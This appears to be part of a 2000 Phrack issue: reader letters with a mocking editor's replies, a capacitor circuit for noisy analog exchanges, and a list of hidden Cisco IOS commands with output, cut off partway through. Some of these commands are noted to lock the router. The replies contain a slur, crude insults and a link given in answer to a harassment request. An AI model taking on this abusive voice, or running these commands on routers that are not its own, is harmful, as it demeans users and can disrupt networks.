"Associate" Hrm. Lookz bleak. ] All i wanted to ask you if you can help me out by telling me how i can start out,i don't intend to reach a master level even though it is an aspiration of mine. [ Whoa Tommy. Rome wasn't built in a day, and neither are superhackers. Start small, keep at it, and take your vitamins and say your prayers like a good little Hulkamaniac. ] I'm currently using my brothers computer because it's a shit load faster than mine and would appreciate it if you could write back and maybe give me some good insight on how i can start out which probably would involve a lot of reading and learning more about programing. [ My first bit of advice is for you to *definitely* steal your brother's computer. Survival of the fittest my boy! And besides, one of the many traits of a superhacker is how fast he can run crackerjack on passwd files (and yes this implies you should be running DOS -- Unix is a fad). My second bit of advice is to read as much as possible. Anything By the late W. Richard Stevens. Check out http://www.securityfocus.com. Keep up to date with current eventz in the security world. Try and make friends in the scene. My third bit of advice is to give up at the first sign of adversity or difficulty. Life rewards cowards, Thomas. Never forget that (persistence pays off in the long run but laziness pays off right away). ] PS:thankyou for taking the time out to read my message [ The pleasure was all mine, Son. ] Thomas |0x20|------------------------------------------------------------------------| my ingles Sux.... [ It'z ok, so doez my Spanish. ] it will be that you source of the accountant of its page could me seder codi? [ "SOMETHING FUNNY AND DISJOINTED IN SPANISH HERE" ] Claudio |0x21|------------------------------------------------------------------------| Hi Phrack Staff. [ Hi Emil. ] Before I start pleading with you i'd just like to say that you have the best E-Zine on the Internet. [ Thanks :). ] I've followed your magazine for about 2 years now. But, as i searched your archive i've noticed that now you have almost no sections on things that go boom (Anarchy etc) anymore. [ Our explosives consultant left for a higher paying job :(. ] I have a vast knowledge of that subject and how to perform things like pyrotechnics safely. I do not know much about encoding (public key lock, i think?) and hacking. But as i said, i am ELITE in pyrotechnics. [ Performing pyrotechnics safely? That's like getting drunk without loaded guns nearby or sex with your cousin.. It may seem like a fun idea, but at the end of the day it'z just kind of a letdown. ] Soooo, please could I submit to Phrack on pyrotechnics and things that go boom. [ Like an 808 trigger on a bass drum? ] I might need some help on encoding, if its really necessery. I am prepared to give up time for Phrack and it would be great if i could submit. [ Hrm. I don't think we have any openingz at the moment.. Tell you what you get me a resume, and I PROMISE to call you when something opens up. ] Maddoc99 |0x22|------------------------------------------------------------------------| Hello, friends, I want to congratulate you and tell you gon on, your stuff is the best. I need some direccions of www where I can find information about phreaking in spanish, so I can read it more easily. Thanks you very much, continue with your job!! romadryn [ http://babelfish.altavista.digital.com/. You're on your own past that, hombre. ] |0x23|------------------------------------------------------------------------| I would just like to say that I have been reading phrack for about 2 years and the current issue has some really good technical articles, better than most others. [ Well thank you very much! ] Thanks for all the shit you put up with, you guys are really funny too, loopback is better than comedy central. Anonymous [ Awe, get out of here! Even better than `The Man Show`? (Which I'm certain will win an Emmy soon.) ] |0x24|------------------------------------------------------------------------| hola .........disculpa que sea breve...pero tengo tanto sueño...y es tan tarde.....como las 4am me llamo gabriel y vivo en panama...aqui la gente ingora que es un hacker.... bueno deseo saber como puedo ser un hacker.... soy un prinipiante..... lo primero que deseo saber es como puedo hacer para conseguir alguna cccclave de acceso a internet dentro de panama..... si me pueden ayudar o no contestenme porfavor......descuiden yo soy una persona de confiar...soy muy leal ...lo juro..... bueno me voy a dormir..... choao y gracias anticipadamente........ Gabriel [ Ok, let'z run this baby through a translator (http://translator.go.com): hello........disculpa that is brief... but I have so much sue\xf1o... and is so late.....como 4am I am called Gabriel and alive in Panama... aqui the ingora people who are to hacker.... good desire to know like I can be to hacker.... I am a prinipiante..... first that desire to know is since I can make to obtain some cccclave of access to Internet within Panama..... if they can help me or contestenme porfavor good right of perpetual ownership does not.....descuiden I I am a person to trust... I am very loyal... it..... I am going away to early sleep..... choao and thanks........ ...It's still unreadable... *sigh*. DON'T YOU PEOPLE GET SESAME STREET DOWN THERE!? Err... ?DON'T USTED CONSIGUE LA CALLE DEL SISAMO ABAJO ALLM!? ] |0x25|------------------------------------------------------------------------| I was informed that certain clans have starcraft programs that enable users to purge others in a multi-player game. Are you familiar with this and if so do you know where I can evaluate such programs. Matt [ Hey, I have an idea, it's called HARD WORK AND HONEST SPORTSMANSHIP. Look into it dork! ] |0x26|------------------------------------------------------------------------| Well i stumbled onto this web-site, i was looking into alternative reading. Let me say this is by far the best. Dark Secrets of the underground is good, but you have collected all your issues in an easy to read format. [ Yah, ASCII is pretty cool, huh? ] Anyway i don't want to sound like some Asshole trying to kiss an ass, [ Whut lovely imagery you've conjured up. ] and if i did then Fuck you. [ Hey eat a dick, count fagula. ] When are you guys publishing more issues, 55 is coming soon i know... [ Phrack 55? What year do you think it is? ] but what of the rest. [ Um... If issue "55" is coming 'soon' then logic dictates 'the rest' will arrive 'later than soon.' Good luck to you and don't chew gum when you walk. ] It is some good shit, let me tell you. By the way where are you guys located? State that is. [ It usually variez from statez of confusion to statez of depression... Sometimez though we find ourselvez in statez of high hilarity. Dependz on the time of the year, ya know? ] Ash BM |0x27|------------------------------------------------------------------------| Hello, I have not the tiniest idea of who you are, [ Now we have common ground! ] but yet I ask for your help. [ Now you've lost me. ] I am interested in learning the fine art of obtaining information via cyberspace (hacking) sounds like a Jeffrey Dahmer hobby to me. [ What in the Christ are you talking about? ] Obviously you are not an idiot so this is why I ask this! Can someone or somebody [ Someone or somebody? ] recommend how to study the art of the Jeffrey Dahmer hobby (please do not give me a I.Q -1 reply) [ You can't be serious. ] I am serious! [ Oh. ] There is alot of talent out here and I want to find a mentor. [ Ok. Let me get this straight. You're looking to me, Phrack Magazine editor and fun-loving happy-fun guy route, to find you a gay-massmurdering-cannibal mentor? ] Thank you, and I think the KKK are a bunch of f...... schnooks!!!!!!!!!!!!!!! [ Of course, but eating people, that's ok rite? ] P.S- In no way am I associated with any law enforcement agency [ Gosh, ya think? ] |0x28|------------------------------------------------------------------------| I need help digging up as much information on a guy who is having an affair with the wife of a friend of mine - it's tearing apart his 18 year marriage and screwing up his two young kids. [ Can't you just ask her? ] I'd like someone to tell me where and/or how to get massive info and then how to make life "interesting" for this marriage wrecker - [ Well, have you tried taking him on a "mystery vacation"? You know, get all the boyz together, jump in the car, and not tell him where you're going (make it real exotic like Yemen or Oman)! ] However you guys do that neat stuff (e-mail bombs, trojans, etc) [ Oh! *That* neat stuff. We just subcontract it all out. ] I would appreciate ANYTHING you can do for me to help my friend. [ http://www.privat.katedral.se/~nv96olli/java.htm ] Rich |0x29|------------------------------------------------------------------------| To: The Sultan of Love, Your humor leaves me jaw agape, sides splitting and a newfound demand for Depends Brand Adult Diapers. [ Grody. ] The world needs more of you. [ Well, I'm kinda partial to instead of *more* of me (ala multiplicity) I think what the World needz, iz a GIANT me (ala The Amazing Colossal Man). I dunno, I think maybe a 50 or 60 foot me would get the job done, and get it done right. ] I didn't see too many letters in Phrack 55 from teenage chicks offering you full juristiction of their bodies as tokens of their appreciation for your overall kickassedness. [ Yeah I noticed that too... I'm hoping Phrack will be banned as some sort of intense aphrodisiac. I'm putting perfume samples in this one and a section entitle "Route's people". If this doesn't do it, I throw up my hands ] Maybe you have a policy of keeping those letters out of the sight of the general public for some reason that evades me. Policy, or not, please let me take this opportunity to say, baby, if you want it, it's all in me. [ Ahem. Phrack Readership. I would just like to take this opportunity to say: HOOOOOOLY SHIT! ONLY THREE AND HALF YEARZ, NINE ISSUEZ AND IT FINALLY WORKED! I hope you can hang 'cause baby, I gotz th' stamina! ] Shagging Men For Their Brain Power Since 1996, Suzy McAssmunch [ Assmunch as I want? ] |0x2a|------------------------------------------------------------------------| I need some help and can't trust friends anymore. Refs would be great. My brother told my landlord some lies and now I'm getting evicted. I have to stay with some relatives now but my fax is out of paper and is a special model. I can't take this trip without the right paper. Can you help? anonymous [ *speechless* (someone off in the background): "Hey route... What's wrong? Dumb got your tounge?" ] |0x2b|------------------------------------------------------------------------| I d like some info about video gambling machines.. [ Well, they're probably some of the worst odds you'll get. ] could you tell me where I could find some? thanx! [ Las Vegas, NV, Tahoe, NV, Any Indian reservation, Atlantic City, NJ ] Anomymous |0x2c|------------------------------------------------------------------------| Hi I'm new to this hacking an not even sure u are the right person to ask but I was chatting to someone in a chatroom recently and we got into an argument about something or other...next thing I know my pc crashes an refuses to re-boot ..closer inspection reveals the motherboard has fried....I can only assume the aformentiond person was the cause of this...so how the hell did they do it???....is there anyway I can guard against this kind of attack??.. Yours worried, Ben [ Consider yourself lucky you got off that easy. This one time I pissed off an online doctor in a chat room. At first I only had a mild fever, but the next thing I know he's having me do my own amputation... Two legs and an arm into it, I realize that maybe he's hacking me! But by then it was too late! ] |0x2d|------------------------------------------------------------------------| Hello, I have this person who keeps pissing me off and going out of his/her way to do it every time I go into various chat rooms. I could change my screen name I suppose, but I'm not going to do that. I will not give in. [ Don't do it man! Stand your ground... The line must be drawn HERE! ] Once an AOL tech told me that there is a way to bump people like that off line, but of course he could not, would not, tell me how. I can't say as I blame him. However since you guys are into things like this [ I try to keep myself thoroughly insulated from America Online (not to be confused with AntiOnline -- they are a whole different kind of dumb). To do this I keep what I call "the three layers of AOL abstraction". That means I don't use America Online, my mom doesn't use America Online, and not even my grandma uses America Online. I'm not 'into things like this'. ] could you PLEASE tell me how I can go about doing such a thing... should this person start up with me again. I had to put up with bullies in school. I refuse to be pushed around in the cyber world. [ Pent-up passive-aggressive dork alert! Whoop! Whoop! ] And NO i do not want to tell AOL...that would make me out to be a tattle tell, and that I'm not. [ Whoop! Whoop! Boy, you're really lighting up this alarm here! ] I would appreciate would make me out to be a tattle tell, and that I'm not. [ Yah, I heard you the first time. ] I would appreciate any help that you could give me. Thank you; HDAWG [ Well DAWG, it seems to me like you have some serious childhood issues. The only advice I can offer you now is to get lots of therapy, or maybe a swift kick to the nuts for being such a wussy. ] |0x2e|------------------------------------------------------------------------| I'm not sure if I am writting to the right person or if yall can even help. I was wondering if you can tell me how i can clear/clean up my credit report. Anonymous [ Shure. PAY YOUR FUCKING BILLS ON TIME! ] |0x2f|------------------------------------------------------------------------| Fuck you and your ignorant attempts at killing me. As darkness falls upon us it is time for revenge. Lock up your windows and doors...I'm coming. I who am Indigo. You will know only my name and not my face, for I will come as a theif in the night. Beware for tonight is the night of reconcile, beware! Your Foe; Indigo [ The night I received this letter I had a turkey pot pie for dinner. I then watched some TV. Fairly boring evening except when I went down to the dryer to get my laundry, I noticed a sock was missing... Coincidence... OR NIGHT-THIEF! ] |0x30|------------------------------------------------------------------------| In this message you will not see any "welcomes", "good words about you", and "asks". But you will see "TRUTH" and only this! [ How about a "you're good at puzzles", or a "route is the best colorer in his ward - he alwayz stays in the lines". ] You think that you are good because you are hackers? [ No, I think I'm good becuase of my daily affirmations. And you can't take those away from me. ] Well really you are nothing than lamers who asks stupid questions. [ Hey! That'z not nice! I've worked hard, and God Fucking Damn you, I'm good enough, smart enough, and people fucking like me! ] Yes I know that some budies is very stupid, I understand this. [ NOT MY BUDDIES MAN! They're the best buddies a guy could ask for! I'm talking about you Stan! And you Gilgamesh! And of course you Little Omar! ] But I don't understand why you flame everybody who post to you. [ Ya know, it just kinda workz out that way. You think I *plan* these things? ] There is some newbies who's really intelligent, and this is important to give him info about what they want. Is this so hard? In the answers like: "Will you help me? [ In all likelihood, no.]" [ PAHAHAHAHAHAHAH. Man. That was me? Shit I'm good! ] you proof that you don't know answer!!! [ Man I can't fool you! I couldn't fool you on the foolingest day of my life even if I had an electrified fooling machine (which I do have by the way). ] You magazine is one the worst of all I've seen. [ Have you seen "Highlights"? (*shutter*) ] Why do you think you don't have cash from write this magz, [ Maybe because Phrack Magazine iz, waz, and alwayz will be FREE OF CHARGE. ] I'm sure that if 2600 may be publishing you mag surelly can be published too? Answer: You don't publish it because nobody will buy him. [ Question: Who am I selling? Is he ugly and dumb? Is it Gary Glitter? ] "Blessed is he who expects nothing, for he shall not be disappointed." [ "Blah Blah Blah". ] Anonymous english as second (or possibly third) language guy |0x31|------------------------------------------------------------------------| hello, at the risk of being flamed in your next issue i felt compelled to write. [ UH-OH! ] reading your latest issue's loopback i noticed that several innocent inquiries were being blasted by the editor. [ You noticed that eh? How delightfully intuitive! ] While reading these was funny, [ YES! ] i felt a bit disheartened. [ DAMN. ] Isn't it a major tenant of hacking to promote freedom of information? [ Christ. I am so sick of people hiding behind the /tenet/ of "Information wants to be free, man!". Mainly because 99% of the people who bleat this platitude like it'z going out of style really don't understand what they're saying. I will say good day to you Fat Tony. ] Responding to inquiries about "how do i hack?" with "piss off peon" or whatever witty equivalent your publication provided, [ Geeze. I like to think I'm a hair more clever than `piss off peon`... ] i felt was in direct contrast to the hacker ethic. how is the tradition ever going to continue if no one is willing to nurture the hackers of the future? [ Nurture? Shure. Change diapers? No. ] is Phrack's message that accomplished hackers should horde their skills and knowledge to the detriment of future hackers? Maybe you should provide newbies with avenues to learning instead of flaming them with "i'm cooler than thou" messages. perhaps part of the hacker communities bad image is their aloofness, their secrecy, and their condescention. Chew on that Phrack. [ I'd answer that but all I want to say is: "Job Security". ] nitefall |0x32|------------------------------------------------------------------------| Great e-zine, has a lot of good stuff in it. [ Well thankz govern'r! ] Outta be required reading. [ I'm working on a proposal with the Board of Education out here to get Phrack in every classroom. I *think* it's going to replace the old issues of '3-2-1 Contact' in the library. I've got a similar bid in with PBS to get a Phrack T.V. show to replace old episodes of K.I.D.S. Incorporated. ] Just a couple of stupid questions: how does one learn about network security and protecting a LAN? [ Beatz the hell out of me. School? ] More importantly, what's the best way to go about learning how to compromise them? [ Do the exact opposite of what you learned about protecting them. ] Mike |0x33|------------------------------------------------------------------------| It's been a LOOONG time since I parsed your 'zine. It sure isn't the same, but it's as good in it's own right. Unfortunately, since I was sipping my coffee while perusing the Loopback file, I must submit the following invoice: 1 Roll Bounty Paper Towels .99 1 Sample Bottle Windex .99 10 Minutes cleaning screen and draining keyboard .99 Subtotal 2.97 Credit for Causing Extreme laughter -2.99 ----- Total -.02 ..Just thought I'd send my own two-cents' Great stuff. Nine months is NOT too long to wait. thanks. m [ Cool thankz man! I'll add those two cents to our operating costs fund! I think that'll give us enough take this baby commercial! ] |EOF|-------------------------------------------------------------------------| - P H R A C K M A G A Z I N E - Volume 0xa Issue 0x38 05.01.2000 0x03[0x10] |----------------------------- L I N E N O I S E -----------------------------| |-----------------------------------------------------------------------------| |------------------------------- phrack staff --------------------------------| Phrack Linenoise is a hodge-podge. Part virtual Mr. Bobo'z table, part Leftorium; Linenoise is where articles that can't quit make it end up. Some of the various reasons things end up here: - Addendum and Errata There is a section in Linenoise specifically for corrections and additions to previous articles. Feedback to articles, however, is alwayz placed in the savory loopback section. - Too short Articles that are just a bit too short to stand on their own, but still contain worthwhile information can end up here. - Niche audience The articles that cater to a narrow group of readerz might also end up here. |0x01|------------------------------------------------------------------------| |------------ data connections on old electromechanical exchanges ------------| |TOKATA & Vladi -----------------------------------------| In many poor countries (such as Bulgaria) there are still a lot of old electromechanical switches - SxS (step-by-step), Panel and Crossbar. Maybe some Phrack readers from these countries download the Phrack releases through these switches. So, I think it is useless to explain the quality of such lines. They are damned noisy, mf! So, with the help of a friend, we developed a new device, a simple one at that, which makes a better data connection. It increases the quality some 30 - 40%! We have successfully tested it with many modems (from 2400bps to 33600bps): DataLink, SunShine, UMC, Rockwell, US Robotics... It _will_ work! Notes: - This device *only* works on 60V switches. AFAIK, those are the only SxS switches around. - List of exchanges (used in Bulgaria), on which this device works: SxS --> A-29 (Siemens), F-61 (maybe Siemens too), ATS-54 (Russian) Xbar --> KRS 103/203 (bulgarian), ATSK - 50 (russian) For Russian people it's quite easy, because we use almost the exact same exchanges (such as ATS-54 and ATSK-50). - The device DON'T work on these exchanges: - ESK - 10000E (also known as Crosspoint, made by Siemens) - "Kvant" (Russian) - EWSD, AXE, MT, ESS (and all the digital exchanges) The schematic is very simple: 2 __o / S o----/ o-----| | 1 | o----|--------------|-------o | | | | o-----------| |-------------o C K --> C --> capacitor. Use a 1uF one (maximum)! You can put a smaller one, but _NOT_ put more than 1uF!!! S --> DPST switch. "1" is position 1, and "2" is position 2. DPST On the schematic you _must_ :-) see the two phone wires. They have the capacitor and the switched connected to them. So, what is the use of the DPST switch? When you begin to dial the switch must be moved to (1). That will shunt the capacitor, otherwise you would not be able to dial through the phone line. When the connection is estabilished - move the switch to (2) in order to join the capacitor. Gotit? Theory of operation All the noise on the old switches springs up from the electromechanical switching process. Our device (the capacitor) is used as a filter of low frequencies (including nasty brooms, which really fuck up data connections). - TOKATA & Vladi |0x02|------------------------------------------------------------------------| |------------------------- Undocumented IOS Commands -------------------------| |krnl-------------------------------------------------------------------------| Introduction Here are some commands in cisco systems' Internetworking Operating System which are hidden from users at any privilege level. Some are informative, while others are rather mundane. Some will even lock the router if invoked incorrectly. This list is a subset of all hidden commands. Descriptions of commands are included where possible. All were tested on a box running 12.0-6S. exec commands @clear profile (clear cpu profiling) @debug ip ospf monitor @debug oir (debug online insertion and removal) @debug par mo (debug parser modes) @debug sanity (debug buffer pool sanity) @debug subsys (debug discrete subsystems) @debug buffer (additional buffer debugging) @gdb kernel @gdb examine pid @gdb debug pid @if-console [] [console|debug] @profile . @sh chunk (show chunks of memory allocated to processes) @sh chunk summ (show chunk allocation summary) @sh idb (shows interface database) @sh in stats (gives you switching path output per interface) @sh ip ospf maxage-list @sh ip ospf delete-list @sh ip ospf statistic @sh ip ospf bad-checksum @sh ip ospf event @sh isis timers @sh isis tree IS-IS link state database AVL tree @sh isis tree level-2 @sh isis private @sh profile [detail|terse] (show cpu profiling) @sh parser modes (shows current process access-tree.) @sh parser unresolv (shows unresolved links in access-tree) @sh list @sh list none @sh region (shows image layout) @sh region
(shows image layout at given address) @sh timers (show timers for timer command in config mode) @sh int switching (shows switching path information for the interface) @sh proc all-events (shows all process events) @sh sum (show current stored image checksum) @test transmit (test the transmission of L2 frames) configuration mode commands @boot system rom @boot module @exception-slave dump X.X.X.X @exception-slave protocol tftp @exception-slave corefile @ip slow-convergence @ip tftp boot-interface @loopback diag @loopback dec (at dec chip) @loopback test @loopback micro-linear @loopback motorola @scheduler max-task-time 200 (last val in milliseconds) @scheduler heapcheck process (memory validation.. after proc) @scheduler heapcheck poll (memory valid after some poll) @scheduler run-degraded (perhaps in a failure mode?) @service internal @service slave-coredump @service log backtrace (provides traceback with every logging instance) @tunnel carry-security in bgp config: @neighbor ctalkb-out filter-as 100 d % filter-as is an obsolete subcommand, use filter-list instead in router isis config: @partition-avoidance XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX @clear profile clears out the current CPU profiling configuration. @debug buffer as with buffer sanity checking, no debugging information on lightly loaded box. ctalkb#debug buffer Additional buffer checking debugging is on @debug ip ospf monitor provides information on the status of the ospf process in the debugging logs. ctalkb#debug ip ospf monitor OSPF spf monitoring debugging is on 2w3d: OSPF: Syncing Routing table with OSPF Database -Traceback= 6064B628 603B6D2C 603B6D18 2w3d: OSPF: Completed Syncing and runtime is 4 msec -Traceback= 6064B65C 603B6D2C 603B6D18 2w3d: OSPF: Start redist-scanning -Traceback= 6064AC20 6062B430 603B6D2C 603B6D18 2w3d: OSPF: Scan for both redistribution and translation -Traceback= 6064AC60 6062B430 603B6D2C 603B6D18 2w3d: OSPF: End scanning, Elapsed time 0ms -Traceback= 6064B13C 6062B430 603B6D2C 603B6D18 2w3d: OSPF: Syncing Routing table with OSPF Database -Traceback= 6064B628 603B6D2C 603B6D18 ctalkb#debug oir Online Insertion and Removal debugging is on 2w3d: OIR: Process woke, 'Event', stall=2, usec=0xB6835B36 -Traceback= 6040967C 603B6D2C 603B6D18 2w3d: OIR: Shutdown pulled interface for Serial5/0 -Traceback= 600E30C4 60409204 604096C8 603B6D2C 603B6D18 2w3d: %OIR-6-REMCARD: Card removed from slot 5, interfaces disabled -Traceback= 60409748 603B6D2C 603B6D18 2w3d: OIR: Remove hwidbs for slot 5 -Traceback= 60409368 60409750 603B6D2C 603B6D18 2w3d: OIR: Process woke, 'Event(max not running)', stall=3, usec=0xD0115C9E -Traceback= 6040967C 603B6D2C 603B6D18 2w3d: OIR: Process woke, 'Timer(max running)', stall=3, usec=0xDDBB56D6 -Traceback= 6040967C 603B6D2C 603B6D18 2w3d: OIR: (Re)Init card 5, retry_count=3 -Traceback= 60409894 603B6D2C 603B6D18 2w3d: %OIR-6-INSCARD: Card inserted in slot 5, interfaces administratively shut down -Traceback= 604098BC 603B6D2C 603B6D18 @debug par mo (debug parser modes) this is used to show what is happening at the parser at specific instances. it will show you a basic walkthrough of the lookups needed to process the cli commands ctalkb#debug par mo Parser mode debugging is on 00:54:40: Look up of parser mode 'controller' succeeded 00:54:40: Look up of parser mode 'route-map' succeeded @debug sanity couldn't get any diagnostic information on this. router is not heavily loaded so there isn't much buffer churn and burn to contend with. ctalkb#debug sanity Buffer pool sanity debugging is on @debug subsys subsystem information indicates a code segment and its version. when i had debugging on, i tried reloading the system microcode. this did not cause any interesting debugging information. ctalkb#debug sub Subsystem debugging is on @debug oir extended online insertion and removal debugging information. @gdb kernel i couldn't get this to do much besides render the router inoperable. there seems to be no interface comparable to the stock gnu debugger. perhaps there are additional parameters that i am missing. this applies to all of the debugger subcommands found. ctalkb#gdb ker Kernel GDB allowed on console terminal only ctalkb#gdb ex 91 ||||(lock up) @gdb debug pid ctalkb# ctalkb#gdb debug 91 Can't debug your own process ctalkb# @if-console [] [console|debug] no output since i don't have a viper router or 12XXX. however, this is one of the most interesting hidden commands available for the cisco. it allows you to get on a card console (i.e. per individual slot instead of per individual chassis) and print out extended diagnostic and debugging information on the specific card. you enter the card in unpriv mode and need to enable before seeing all of the commands. @profile . you can setup cpu profiling in the exec mode with the profile command. process profiling allows you to find which segment of code is perhaps hogging the CPU.. what you really need to get use out of this feature is a symbol table so you can pull the location of the appropriate segment of code. the segment is defined by the start and stop values given to the profile command. the granularity specifier allows you to get down to single instruction level. the cpu has its own internal timer that is incremented regardless of whether the desired segment of code is executed. when the desired segment of code is executed, a per-profile counter is incremented. comparison of this counter with the overall system timer allows you to get some handle on how much of the cpu the specific segment is using. ctalkb#profile ? task start stop hogs <0-FFFFFFFF> @show chunk (show chunks of memory allocated to processes) there is the traditional malloc/free memory management in place on the cisco. there is also chunk allocation. the main benefit of chunk allocation over its predecessor is that memory overhead is only paid by the large chunk (which is then carved up into smaller pieces) instead of by each individual malloced block. ctalkb#sh chunk Chunk Manager: 142 chunks created, 1 chunks destroyed 46 siblings created, 0 siblings trimmed Chunk element Block Maximum Element Element Total cfgsize Ohead size element inuse freed Ohead Name 16 0 65532 3270 717 2553 8 List Elements 0x61525688 52 0 65532 1168 0 1168 0 List Headers 0x61535684 16 0 65532 3270 0 3270 8 messages 0x61550068 @show chunk summ summary listing of allocated chunks. shows you big chunk size, the number of siblings divided up within that chunk space as well as the overhead taken by the chunk. ctalkb#sh chunk sum Chunk Manager: 142 chunks created, 1 chunks destroyed 46 siblings created, 0 siblings trimmed Element Sibling size Total Total Total Inuse Ovrhd Chunk Flag size(b) --range(b)-- Siblg alloc Free HWM (b) name D 16 253- 752 0 3270 2553 724 8 ListElements D 52 1003- 1502 0 1168 1168 0 0 List Headers D 16 253- 752 0 3270 3270 21 8 messages D 8 253- 752 0 5450 3974 1476 8 Reg Function 8 @sh idb This command shows the hardware and software interface databases. this is cisco's way of keeping track of how many interfaces are present on the system.. includes hardware and software interfaces (physical, subinterfaces etc). there is a software limit of 1024 i believe in ios 11 and 2048 in ios 12. this is a global limit for the router. output: ctalkb#sh idb 19 SW IDBs allocated (2296 bytes each) 9 HW IDBs allocated (4008 bytes each) HWIDB#1 1 FastEthernet0/0 (Ether) HWIDB#2 2 Serial2/0:0 (Serial) HWIDB#3 3 Ethernet3/0 (Ether) HWIDB#4 4 Ethernet3/1 (Ether) HWIDB#5 5 Ethernet3/2 (Ether) HWIDB#6 6 Ethernet3/3 (Ether) HWIDB#7 7 Serial4/0 (Serial) HWIDB#8 8 Serial5/0 (Serial) HWIDB#9 9 Loopback0 @sh in stats (gives you switching path output per interface) Ethernet3/0 Switching path Pkts In Chars In Pkts Out Chars Out Processor 786433 594121827 556812 177400752 Route cache 107469 8910774 107451 8925784 Total 893902 603032601 664263 186326536 @sh int e3/0 switching goes over some of the basic processes and the data that they are processing. shows what switching paths were used for the specific data counted. basic processes == IP and routing processes. others are lumped into the default category. ctalkb#sh int e3/0 switching Ethernet3/0 Throttle count 0 Drops RP 0 SP 0 SPD Flushes Fast 0 SSE 0 SPD Aggress Fast 0 SPD Priority Inputs 972 Drops 0 Protocol Path Pkts In Chars In Pkts Out Chars Out Other Process 0 0 167 10020 Cache misses 0 Fast 0 0 0 0 Auton/SSE 0 0 0 0 IP Process 4556 282352 3733 541124 Cache misses 0 @sh ip ospf maxage-list don't have ospf running.. would seem that this command shows you the current value of the max-lsa age. there is some periodic refresh which needs to be accounted for. ctalkb#sh ip ospf max AS System N Maxage delete timer due in NEVER @sh ip ospf delete-list this command shows you the lsas which have been deleted from consideration. as i don't have ospf running, i can't ascertain whether this is lsas which were taken out of consideration by the SPF algorithm or by other means. ctalkb#sh ip ospf delet AS System N Area BACKBONE(0) ROUTER and NETWORK LSDB delete list Dest: 172.16.0.1, Type: 0, Metric: 1, ADV RTR: 172.16.0.1 Path: gateway 172.16.0.1, interface Loopback0 SUMMARY NET and ASBR LSDB delete list TYPE-7 EXTERNAL LSDB delete list EXTERNAL LSDB delete list @sh ip ospf statistic this is a really handy command because it gives you time averages of different portions of the ospf process. this is useful in that it further lets you pin down IGP convergence times on your network as well as to isolate the areas which are causing the process to chug. ctalkb#sh ip ospf stat Area 0: SPF algorithm executed 1 times SPF calculation time Delta T Intra D-Intra Summ D-Summ Ext D-Ext Total Reason 2w3d 0 0 0 0 0 0 0 R, Avg. and Accumulated time of the last 250 process_ase() Avg. Accumulated ASBR-lookup 0, 0 Forw-Addr-lookup 0, 0 compare metric 0, 0 ... (more) @sh ip ospf bad-checksum shows LSAs which have failed the checksum. not sure if this is a count or actual event times since i didn't have ospf functioning. @sh ip ospf event provides a history lists of subprocess function execution.. useful so that the operator can understand a bit more about the execution flow ctalkb#sh ip ospf eve 1 54700 Generic: ospf_redist_callback 0x618B36A4 2 114716 Generic: ospf_redist_callback 0x618B36A4 3 174736 Generic: ospf_redist_callback 0x618B36A4 4 234756 Generic: ospf_redist_callback 0x618B36A4 5 294772 Generic: ospf_redist_callback 0x618B36A4 6 320796 Generic: ospf_build_ex_lsa 0xC658FF00 7 320796 Generic: ospf_build_ex_lsa 0xAC100000 8 320796 Generic: ospf_build_ex_lsa 0xD16F5C00 @sh isis timers useful in that it provides a brief overview of execution flow in the isis process. shows you frequency of things like l1/l2 hello etc. ctalkb#sh isis timers Hello Process Expiration Type | 0.856 (Parent) | 0.856 L2 Hello (Ethernet3/0) | 6.352 L1 Hello (Ethernet3/0) | 6.940 Adjacency Update Process Expiration Type | 1.060 (Parent) | 1.060 Ager | 1.352 L2 CSNP (Ethernet3/0) | 8.616 L1 CSNP (Ethernet3/0) | 3:25.860 (Parent) | 3:25.860 LSP refresh | 9:02.160 LSP lifetime | 9:24.568 LSP lifetime | 17:16.084 LSP lifetime | 20:58.536 Dynamic Hostname cleanup @sh isis tree IS-IS link state database AVL tree shows path and depth taken to get to other level 1/2 intermediate systems in some routing domain. shows both by default. ctalkb#sh isis tree IS-IS Level-2 AVL Tree Current node = X.X.X.00-00, depth = 0, bal = 0 Go down left Current node = X.X.Y.00-00, depth = 1, bal = 0 ---> Hit node X.X.Y.00-00 Back up to X.X.X.00-00 Current node = X.X.X.00-00, depth = 0, bal = 0 ---> Hit node X.X.X.00-00 Go down right Current node = X.X.X.02-00, depth = 1, bal = 0 ---> Hit node X.X.X.02-00 Back up to X.X.X.00-00 @sh isis private displays a little diagnostic information related to the isis process. ctalkb#sh isis private ISIS: FastPSNP cache (hits/misses): 0/4002 ISIS: LSPIX validations (full/skipped): 216271/490412 ISIS: LSP HT=0 checksum errors received: 0 ctalkb# @sh list perhaps a singly linked list manager which displays global pointer to the first element in each linked list as well as the number of members in each list. ctalkb# sh list List Manager: 1415 lists known, 1561 lists created ID Address Size/Max Name 1 613EE970 11/- Region List 2 613EEE98 1/- Processor 3 613EFDE8 1/- I/O 4 613F0D38 1/- I/O-2 5 6149EDD0 0/- Sched Critical 6 6149ED90 0/- Sched High 7 6149EB00 0/- Sched Normal @sh list none ctalkb# sh list none List Manager: 1415 lists known, 1561 lists created ID Address Size/Max Name 1 613EE970 11/- Region List 2 613EEE98 1/- Processor 3 613EFDE8 1/- I/O 4 613F0D38 1/- I/O-2 9 6149ED10 82/- Sched Idle 11 61499A50 8/- Sched Normal (Old) 12 6149CC10 1/- Sched Low (Old) @sh parser modes (shows current process access-tree.) ctalkb#sh par mo Parser modes: Name Prompt Top Alias Privilege exec 0x60EFB294TRUE TRUE configure config 0x60EFABACTRUE TRUE interface config-if 0x60EF7AECTRUE TRUE subinterface config-subif 0x60EF7AECTRUE FALSE null-interface config-if 0x60EFB368TRUE TRUE line config-line 0x60EF3F84TRUE TRUE @sh parser un ctalkb#sh parser un Unresolved parse chains: 40 40 198 198 322 @sh proc all-events ctalkb#sh proc all-events Queue Notifications Event Name Pid 1 Process 61588410 Pool Grows 4 Pool Manager ct 0 615A156C Log Messages 19 Logger ct 0 615EE8A0 IPC inboundQ 11 IPC Seat Manager ct 0 615EE934 IPC Zone inboundQ 9 IPC Zone Manager ct 0 61642840 ARP queue 12 ARP Input ct 0 @sh profile [detail|terse] (show cpu profiling) ctalkb#sh prof d Profiling enabled Block 0: start = 91, end = FFF, increment = 8, EXEC Total = 0 System total = 9802 ctalkb#sh prof t PROF 91 FFF 8 PROFTOT 10065 ctalkb# @sh region (shows image layout) displays the program layout for the uncompressed image. ctalkb#sh region Region Manager: Start End Size(b) Class Media Name 0x07800000 0x07FFFFFF 8388608 Iomem R/W iomem2 0x20000000 0x21FFFFFF 33554432 Iomem R/W iomem 